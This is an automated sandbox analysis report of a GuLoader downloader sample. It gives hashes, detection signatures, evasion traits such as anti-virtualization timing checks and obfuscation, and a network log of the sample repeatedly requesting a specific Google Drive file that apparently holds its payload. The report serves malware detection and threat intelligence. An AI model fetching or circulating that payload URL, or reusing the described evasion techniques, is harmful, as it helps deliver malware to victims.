Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fTSt7dc60O.exe

Overview

General Information

Sample name:fTSt7dc60O.exe
renamed because original name is a hash value
Original sample name:2eaf30511cb438075facb1d59f944a6ddedf3aa5c2620e0916a150f5415983bb.exe
Analysis ID:1587610
MD5:0eecc852b848039da55141fb43dd01e2
SHA1:9f1f57db9890e515dd132bc7d1157ef1a2ff0cad
SHA256:2eaf30511cb438075facb1d59f944a6ddedf3aa5c2620e0916a150f5415983bb
Tags:exeuser-adrian__luca
Infos:

Detection

GuLoader
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • fTSt7dc60O.exe (PID: 7936 cmdline: "C:\Users\user\Desktop\fTSt7dc60O.exe" MD5: 0EECC852B848039DA55141FB43DD01E2)
    • fTSt7dc60O.exe (PID: 8092 cmdline: "C:\Users\user\Desktop\fTSt7dc60O.exe" MD5: 0EECC852B848039DA55141FB43DD01E2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.3153038380.000000000219B000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000000.00000002.1432262066.000000000551B000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-10T15:46:42.761217+010028032702Potentially Bad Traffic192.168.2.1049842216.58.206.78443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: fTSt7dc60O.exeReversingLabs: Detection: 66%
      Source: fTSt7dc60O.exeVirustotal: Detection: 77%Perma Link
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: fTSt7dc60O.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.10:49842 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.10:49853 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.10:49917 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.10:49979 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.10:49982 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.10:49984 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.10:49987 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.10:49989 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.10:49991 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.10:49993 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.10:49995 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.10:49997 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.10:49998 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.10:50001 version: TLS 1.2
      Source: fTSt7dc60O.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004057D0
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_0040628B FindFirstFileW,FindClose,0_2_0040628B
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 2_2_00402770 FindFirstFileW,2_2_00402770
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 2_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_004057D0
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 2_2_0040628B FindFirstFileW,FindClose,2_2_0040628B
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.10:49842 -> 216.58.206.78:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
